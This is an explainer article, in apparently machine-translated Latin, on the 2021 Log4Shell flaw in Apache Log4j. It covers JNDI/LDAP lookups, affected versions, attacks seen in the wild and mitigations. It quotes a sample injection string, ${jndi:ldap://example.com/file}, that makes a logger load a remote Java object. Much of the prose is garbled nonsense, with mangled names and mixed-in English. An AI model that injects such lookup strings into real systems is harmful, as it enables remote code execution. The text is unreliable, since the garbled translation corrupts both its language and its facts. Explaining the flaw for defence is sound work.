Table of Contents[Hide][Show]
Nove Novembri 2021, maiorem comminationem cybersecuritatis deteximus. Hoc facinus potentialiter ad myriades systematum computatrorum per orbem terrarum afficere posset.
Hic est dux vulnerabilitas in Log4 et quomodo neglecta designatio vitii super 90% mundi officia computatrum aperta ad oppugnationem superest.
Apache Log4j est fons apertus Java-fundatur logging utilitas ab Apache Fundatione Software evoluta. Primitus scripsit Ceki Gülcü in MMI, nunc pars est Apache Logging Services, consilium Apache Fundationis Software.
Societates circa mundum utuntur bibliotheca Log4j ut colligationem in suis applicationibus faciant. Re vera bibliotheca Java tam ubiquitosa est, eam in applicationibus ab Amazonibus, Microsoft, Google, et pluribus invenire potes.
Eximium bibliothecae significat ullum potentiale vitium in codice posse excedere decies centena milia computatrorum ad caesim aperta. Die 24 mensis Novembris anno 2021, a nubes securitatis indagator adque Alibaba foedum vitium repertum est.
Lusoria Log4j, quae etiam Log4Shell nota est, latuit ab 2013. In lusu malitiosos actores permisit currere codicem in systemata affectata Log4j currentem. Publice detectum est die 9 mensis Decembris anno 2021 .
Industria periti vocant Log4Shell vitium maxima vulnerability in recenti memoria.
In septimana post publicationem vulnerabilitas, iugis cybersecuritates decies centena milia impetus deprehendit. Nonnulli investigatores etiam observaverunt aestimationem supra centum impetus per minutias.
Quid opus est?
Intellegere quare Log4Shell tam periculosum est, intelligere debemus quid possit.
In vulnerabilitate Log4Shell permittit pro arbitrario codice executioni, quod plerumque significat oppugnatorem aliquod mandatum vel signum in machina machinae currere posse.
Quomodo hoc?
Primo sciendum quid sit JNDI.
Java Nomen and Directorium Interface (JNDI) est officium Javae quod programmata Javae permittit ut notitias et facultates per nomen cognoscendi et videndi. Haec officia directoria magni momenti sunt quod constituto monumentorum instrumentorum constituto praebent tincidunt ut applicationes creando facile referant.
JNDI varia protocolla uti ad certum presulem accedere possunt. Una ex his protocolla est Index Access Protocollum leve, seu LDAP.
Cum filo colligationem; log4j facit filum substitutiones cum occurrant expressiones formae ${prefix:name}
.
Ut pro exemplo, Text: ${java:version}
posset esse initium sicut Textus: Java version 1.8.0_65. Huiusmodi substitutiones sunt communes.
Possumus etiam habere voces ut Text: ${jndi:ldap://example.com/file}
qui systematis JNDI utitur ut Java objectum ab Domicilio per protocollum LDAP oneret.
Hoc efficaciter notitias ab illo URL venientes in machinam onerat. Piratica quaevis potentiale potest codicem malitiosum in URL publico hospitari et machinas expectare utendo Log4j ut eam logas.
Cum contenta epistularum iniuriarum continentes notitias usoris continentes, hackers suas notiones JNDI inserere possunt quae ad LDAP ministrantes designant quos regunt. Hae LDAP servientes plenae esse possunt obiectis malignis Javae quas JNDI per vulnerabilitatem exercere possunt.
Quo magis hoc peius est quod nihil interest, si applicatio ad latus vel clientis applicationis est.
Quamdiu via est ad loggem legendi invasoris malivoli codicem, applicatio ad res gestas adhuc patet.
Quis est affectus?
In vulnerabilitate afficit omnes systemata et officia quae APache Log4j utuntur, cum versionibus 2.0 usque ad et inter 2.14.1.
Plures periti securitatis suadent ut vulnerabilitas numerum applicationum Javae utendi attingat.
Vitium primum inventum est in Microsoft possessores Minecraft video venatus. Microsoft suasit utentes ad upgrade eorum Java editione programmata Minecraft ne ullum periculum.
Jen Paschale, Director of Cybersecurity and Infrastructure Securitatis Agency (CISA) dicit venditores habere maioris responsibility ne finis users a malignis actores abutitur hac lusu.
"Vendotores etiam communicare debent cum clientibus suis ut fines utentes sciant se eorum producti hanc vulnerabilitatem continere ac programmatum interretialem debere".
Impetus iam parem nuntiaverunt. Symantec, societas quae programmationem cybersecuritatis praebet, varias postulationum numerum observavit.
Hic sunt aliqua exempla specierum impugnationum quas investigatores detexerunt;
- botnets
Botnets sunt retis computers qui sub unius partis oppugnationis potestate sunt. Auxiliatur DDoS impetus, data furantur, et alia scams. Investigatores observarunt Muhstik botnet in scriptorum testarum de Log4j absumptis.
- XMRig Miner Trojana
XMRig fons apertus est fossores cryptocurrency qui utitur CPUs ad indicium Monero meum. Cybercriminales XMRig in hominum machinas instituere possunt ut sua potestate sine scientia sua uti possint.
- Khonsari Ransomware
Ransomware refers to a malware forma disposito encrypt files in computatro. Impugnatores tunc mercedem pro commutatione dare possunt accessum ad tabellas encryptatas. Investigatores Khonsari pretium in Log4Shell invenerunt impetus. Fenestras servientes oppugnant et .NET compage utuntur.
Quid deinde fit?
Periti praedicunt eum capere menses vel fortasse etiam annos ad chaos plene figere per vulnerabilitatem Log4J effectam.
Hic processus involvit adaequationem omnem systematis affecti cum versione sarcinata. Etiamsi omnia haec systemata inter se dissociantur, adhuc imminet imminens postium possibilium quae hackers iam accesserunt ad fenestras quae ministris oppugnationis apertae erant.
Multi solutiones ac mitigationes est ne applicationes ab hoc bug abutuntur. Nova Log4j versio 2.15.0-rc1 varias occasus mutavit ad hanc vulnerabilitatem mitigandam.
Omnes lineamenta utens JNDI debilitata erunt per default et aspectus remotiores etiam restricti sunt. Inactivare speculam pluma in Log4j setup adiuvabit periculum rerum possibilium decrescere.
Extra Log4j, adhuc opus est ampliore consilio, ne res gestae apertae sint.
Maturius mense Maio, Domus Alba dimissa est exsecutiva ordinem quae ad cybersecurity nationalem meliorem intendebant. Inclusit provisionem programmatis materiarum (SBOM) quae essentialiter documentum formale erat, quo indice rerum omnium opus erat ad applicationem aedificandae.
Hoc includit partes, ut aperta principium fasciculi, clientelas et APIs ad evolutionem adhibentur. Etsi idea SBOMs ad diaphaneitatem adiuvat, verene adiuvabit consumer?
Upgrading clientelas hasslae nimium esse possunt. Societates solum eligere possunt ad quaslibet multas pecunias quam periculum perdendi temporis subsicivum sarcinas inveniendas. Forsitan SBOMs hae tantum utiles erunt si eorum scope finitur porro.
Conclusio
Quaestio Log4i plusquam technica quaestio pro institutis est.
Negotii duces conscii esse debent periculorum potentialium quae fieri possunt cum ministris, fructibus, vel officiis in codice nituntur se ipsos non conservaturos.
In aperto fonte freti et tertiae partis applicationes semper cum aliquo periculo veniunt. Societates periculum mitigationis consilia excogitare debent antequam novae minae in lucem proveniant.
Multum interretialis programmatis apertis-fontis nititur per milia voluntariorum per orbem terrarum conservata.
Si locum tutum servare velimus, gubernationes et corporationes collocare debent in fundatione aperta fundationis conatus ac cybersecuritas institutionum, ut sunt. CISA.
Leave a Reply